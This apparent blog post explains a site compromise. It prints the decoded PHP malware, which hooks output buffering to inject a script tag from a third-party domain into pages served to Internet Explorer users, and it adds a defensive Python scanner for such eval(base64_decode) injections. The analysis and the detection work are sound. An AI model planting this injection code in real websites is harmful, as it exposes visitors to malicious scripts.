Well, it appears that some nasty spammer managed to add some JavaScript to the footer of this blog, and so if you’ve accessed it recently using Internet Explorer you should make sure your anti-virus is up to date.
I’m still looking into what happened, and since we’re about to go offline for a week, I’ve temporarily hobbled the blog slightly to prevent the spam from showing. This means that some pages might not work quite as expected (e.g. the “where are we” map). We’re still here and normal service will be resumed in a bit.
We’re very sorry for the inconvenience; we have no desire to have any advertising or whatnot pop up while you’re gracing us with your time!
Many thanks to Laura’s Dad for pointing this out; hopefully it won’t happen again.
Update, September 22nd
So it turns out my hobbling above still didn’t fix the problem. I’ve finally cleared things out and all should now be fine. If anyone’s interested, it looks like we were hit by a variant of this: http://sucuri.net/malware/malware-entry-mwmrobh2
I’m still unclear on the infection route, but think it probably happened due to brute force guessing of our admin password, which has now been changed, along with everything else.
The problem code inserted a base64-encoded string into each PHP file, to be passed to eval(); decoded, it is the following (comments added by me).
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no']))
{
    $GLOBALS['mr_no']=1; // guard so the payload only runs once per request, however many files carry it
    if(!function_exists('mrobh')){
        if(!function_exists('gml')){
            function gml(){
                // Only Internet Explorer 6 to 9 visitors get the injected tag; everyone else sees a clean page
                if (stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")
                    ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")
                    ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")
                    ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){
                    return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3Rzbm93LmNvbS9ubC5waHA/bm5uPTEiPjwvc2NyaXB0Pg==");
                }
                return "";
            }
            // That decodes to <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1"></script>
            // which is the suspect javascript
        }
        // This then sets the output buffer to rewrite each page and drop the above script just before
        // the </body> tag. Cunning, especially with the gzdecode stuff.
        if(!function_exists('gzdecode')){
            function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
                // Hand-rolled gzip header parser (for PHP builds without gzdecode()):
                // read the FLG byte, skip the optional header fields, then inflate the rest
                $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
                $RBE4C4D037E939226F65812885A53DAD9=10; // fixed 10-byte gzip header
                $RA3D52E52A48936CDE0F5356BB08652F2=0;  // unused
                if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ // FEXTRA: 2-byte length plus extra field
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                    $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ // FNAME: NUL-terminated file name
                    $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ // FCOMMENT: NUL-terminated comment
                    $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ // FHCRC: 2-byte header CRC
                    $RBE4C4D037E939226F65812885A53DAD9+=2;
                }
                $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
                if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
                    // Not gzip after all: treat the buffer as plain HTML
                    $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
                }
                return $R034AE2AB94F99CC81B389A1822DA3353;
            }
        }
        // Output-buffer callback: decompress the finished page, splice the script in before </body>
        // (or append it if there is no </body>), and tell the browser the result is uncompressed
        function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
            Header('Content-Encoding: none');
            $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
            if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
                return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
            }else{
                return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
            }
        }
        ob_start('mrobh');
    }
}
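As an added example (not code from this post, and not part of any tool the author used), here is a small Python scanner for the injection shape described above: it finds eval(base64_decode('...')) in PHP files, decodes the payload, looks for the strings visible in the decoded code (the mr_no guard, the mrobh output-buffer callback, the user-agent check) and pulls out any nested base64 literal that decodes to a script tag. The two sample files, the http://example.invalid URL and the marker list are constructed for the example.

```python
import base64
import re
import tempfile
from pathlib import Path

# Shape of the injection the post describes: a whole PHP payload, base64-encoded,
# handed straight to eval() at the top of each .php file.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)\s*\)""",
    re.IGNORECASE,
)
# Base64 literals inside the decoded payload (the dropped <script> tag hides in one).
INNER_B64 = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""", re.IGNORECASE)
# Strings lifted from the decoded payload shown in the post; two or more is a confident match.
MARKERS = ("ob_start(", "$GLOBALS['mr_no']", "function mrobh", "HTTP_USER_AGENT")


def decode_payload(blob: str) -> str:
    """Strictly decode a base64 literal; return '' if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def scan_php_source(src: str) -> list[dict]:
    """Return one finding per eval(base64_decode(...)) in a PHP source string."""
    findings = []
    for m in EVAL_B64.finditer(src):
        payload = decode_payload(m.group(1))
        markers = [k for k in MARKERS if k in payload]
        scripts = []
        for inner in INNER_B64.findall(payload):
            text = decode_payload(inner)
            if "<script" in text.lower():
                scripts.append(text)
        verdict = "infected" if len(markers) >= 2 or scripts else "suspicious"
        findings.append({"offset": m.start(), "verdict": verdict,
                         "markers": markers, "scripts": scripts})
    return findings


def scan_tree(root: Path) -> dict[str, list[dict]]:
    """Scan every .php file below root; map relative path -> findings (files with hits only)."""
    report = {}
    for path in sorted(root.rglob("*.php")):
        findings = scan_php_source(path.read_text(encoding="utf-8", errors="replace"))
        if findings:
            report[str(path.relative_to(root))] = findings
    return report


# --- Constructed sample files (not taken from the post) -----------------------
INNER_SCRIPT = base64.b64encode(b'<script src="http://example.invalid/nl.php"></script>').decode()
PAYLOAD_PHP = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){$GLOBALS['mr_no']=1;"
    'function gml(){if(stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")){'
    'return base64_decode("' + INNER_SCRIPT + '");}return "";}'
    "function mrobh($b){return $b.gml();}ob_start('mrobh');}"
)
INFECTED_FILE = ("<?php eval(base64_decode('" + base64.b64encode(PAYLOAD_PHP.encode()).decode()
                 + "')); ?>\n<?php echo 'site header'; ?>\n")
# Legitimate base64 use without eval(): must not be flagged.
CLEAN_FILE = "<?php echo base64_decode('aGVsbG8='); ?>\n"


def demo() -> dict[str, list[dict]]:
    """Write the two sample files into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content").mkdir()
        (root / "index.php").write_text(INFECTED_FILE)
        (root / "wp-content" / "clean.php").write_text(CLEAN_FILE)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, found in demo().items():
        for f in found:
            print(f"{rel}: {f['verdict']} at byte {f['offset']}; "
                  f"markers={f['markers']}; scripts={f['scripts']}")
```

Run it against a copy of the web root rather than the live files. A "suspicious" verdict means an eval(base64_decode()) whose payload matched none of the markers; read that payload by hand rather than trusting the list, since variants rename the functions and guard variable.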
(Ah, that brings back some memories of Slang from GS… Dynamic function definitions, oh yes)
Anyway, all should be good now. Hopefully we don’t get hacked again tonight!
Simon